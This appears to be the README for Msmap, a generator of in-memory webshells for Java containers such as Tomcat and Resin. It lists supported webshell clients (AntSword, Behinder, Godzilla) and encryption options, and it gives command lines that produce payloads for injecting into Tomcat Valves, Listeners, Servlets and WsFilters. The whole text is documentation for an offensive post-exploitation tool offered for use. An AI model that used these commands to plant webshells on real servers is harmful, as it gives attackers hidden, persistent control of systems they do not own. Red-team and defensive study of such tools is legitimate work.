2022-08-20 09:20:08 +00:00
Msmap is a Memory WebShell Generator. Compatible with various Containers, Components, Encoder, *WebShell / Proxy / Killer* and Management Clients. [简体中文 ](README_CN.md )
[The idea behind I ](https://hosch3n.github.io/2022/08/08/Msmap%E5%86%85%E5%AD%98%E9%A9%AC%E7%94%9F%E6%88%90%E6%A1%86%E6%9E%B6%EF%BC%88%E4%B8%80%EF%BC%89/ ), [The idea behind II ](https://hosch3n.github.io/2022/08/09/Msmap%E5%86%85%E5%AD%98%E9%A9%AC%E7%94%9F%E6%88%90%E6%A1%86%E6%9E%B6%EF%BC%88%E4%BA%8C%EF%BC%89/ )
2022-08-20 09:21:44 +00:00
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2022-08-20 09:21:44 +00:00
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2022-08-20 09:21:44 +00:00
2022-08-20 09:20:08 +00:00
< details >
< summary > Feature [WIP]< / summary >
### Function
- [x] Dynamic Menu
- [x] Automatic Compilation
- [x] Generate Script
- [ ] Lite Mode
- [ ] Graphical Interface
### Container
- Java
- [ ] Tomcat7
- [x] Tomcat8
- [x] Tomcat9
- [x] Tomcat10
- [ ] Resin3
- [x] Resin4
- [ ] WebSphere
- [ ] GlassFish
- [ ] WebLogic
- [ ] JBoss
- [ ] Spring
- [ ] Netty
- .NET
- [ ] IIS
### WebShell / Proxy / Killer
- WebShell
- [x] CMD / SH
- [x] AntSword
- [x] JSPJS
- [x] Behinder
- [x] Godzilla
- No need for modularity
~~Proxy: Neo-reGeorg, wsproxy~~
~~Killer: java-memshell-scanner, ASP.NET-Memshell-Scanner~~
### Decoder / Decryptor / Hasher
- Decoder
- [x] Base64
- [ ] Hex
- Decryptor
- [x] RC4
- [x] AES128
- [x] AES256
- [ ] RSA
- Hasher
- [x] MD5
- [x] SHA128
- [x] SHA256
< / details >
## Usage
``` bash
git clone git@github.com:hosch3n/msmap.git
cd msmap
python generator.py
> [Warning] MUST set a unique password, Options are case sensitive.
### Advanced
Edit `config/environment.py`
``` python
# Auto Compile
auto_build = True
# Base64 Encode Class File
b64_class = True
# Generate Script File
generate_script = True
# Compiler Absolute Path
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
Edit `gist/java/container/tomcat/servlet.py`
``` java
// Servlet Path Pattern
private static String pattern = "*.xml";
WsFilter does not currently support automatic compilation. If an encryption encoder is used, the password needs to be the same as the path (eg `/passwd` )
## Example
< details >
< summary > CMD / SH< / summary >
**Command** with **Base64** Encoder | Inject Tomcat Valve
`python generator.py Java Tomcat Valve Base64 CMD passwd`
< / details >
< details >
< summary > AntSword< / summary >
Type **JSP** with **default** Encoder | Inject Tomcat Valve
`python generator.py Java Tomcat Valve RAW AntSword passwd`
Type **JSP** with ** [aes_128_ecb_pkcs7_padding_md5 ](extend/AntSword/encoder/aes_128_ecb_pkcs7_padding_md5.js )** Encoder | Inject Tomcat Listener
`python generator.py Java Tomcat Listener AES128 AntSword passwd`
Type **JSP** with ** [rc_4_sha256 ](extend/AntSword/encoder/rc_4_sha256.js )** Encoder | Inject Tomcat Servlet
`python generator.py Java Tomcat Servlet RC4 AntSword passwd`
Type **JSPJS** with ** [aes_128_ecb_pkcs7_padding_md5 ](extend/AntSword/encoder/aes_128_ecb_pkcs7_padding_md5.js )** Encoder | Inject Tomcat WsFilter
`python generator.py Java Tomcat WsFilter AES128 JSPJS passwd`
< / details >
< details >
< summary > Behinder< / summary >
Type **default_aes** | Inject Tomcat Valve
`python generator.py Java Tomcat Valve AES128 Behinder rebeyond`
< / details >
< details >
< summary > Godzilla< / summary >
Type **JAVA_AES_BASE64** | Inject Tomcat Valve
`python generator.py Java Tomcat Valve AES128 Godzilla superidol`
> [Known issue](https://github.com/BeichenDream/Godzilla/issues/76)
< / details >
## Reference
[GodzillaMemoryShellProject ](https://github.com/BeichenDream/GodzillaMemoryShellProject )
[AntSword-JSP-Template ](https://github.com/AntSwordProject/AntSword-JSP-Template )
[As-Exploits memshell_manage ](https://github.com/yzddmr6/As-Exploits/tree/master/core/memshell_manage )
[Behinder ](https://github.com/rebeyond/Behinder ) | [wsMemShell ](https://github.com/veo/wsMemShell ) | [ysomap ](https://github.com/wh1t3p1g/ysomap )